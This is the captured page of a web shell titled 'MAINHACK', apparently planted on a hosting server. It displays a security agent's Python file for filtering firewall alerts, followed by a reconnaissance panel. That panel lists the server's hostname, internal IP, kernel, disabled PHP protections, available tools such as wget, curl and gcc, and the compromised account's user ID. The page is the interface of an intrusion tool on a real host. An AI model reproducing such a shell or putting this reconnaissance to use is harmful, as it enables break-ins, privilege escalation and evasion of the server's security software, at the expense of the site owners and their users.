[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: ignored_rules.py
File is not writable. Editing disabled.
import logging import re from defence360agent.contracts.messages import MessageType, Reject from defence360agent.contracts.plugins import MessageSink, expect from im360.model.incident import DisabledRule logger = logging.getLogger(__name__) class FilterIgnoredRules(MessageSink): PROCESSING_ORDER = MessageSink.ProcessingOrder.IGNORE_MESSAGE async def create_sink(self, loop): self._loop = loop @expect(MessageType.SensorAlert, MessageType.SensorIncident) async def filter(self, msg): # filtering third-party rules known to be high FP try: if isinstance(msg, MessageType.SensorAlert): self._reject_non_i360_modsec_rules(msg) self._filter_user_configured(msg) except KeyError as e: logger.warning("Not enough fields in %s: %s", msg, e) def _reject_non_i360_modsec_rules(self, msg): if msg['plugin_id'] == 'modsec' and not is_i360_rule(msg['rule']): raise Reject('Non Imunify360 modsec rule is ignored') def _filter_user_configured(self, msg): if DisabledRule.is_rule_ignored( msg['plugin_id'], msg['rule'], msg.get('host', None)): raise Reject('Rule ignored by user settings') def is_i360_rule(rule_id): """Whether the *rule_id* belongs to Imunify360 modsec ruleset.""" return re.fullmatch(r"333\d{2}|(?:77|88)\d{6}", rule_id)
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.13 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A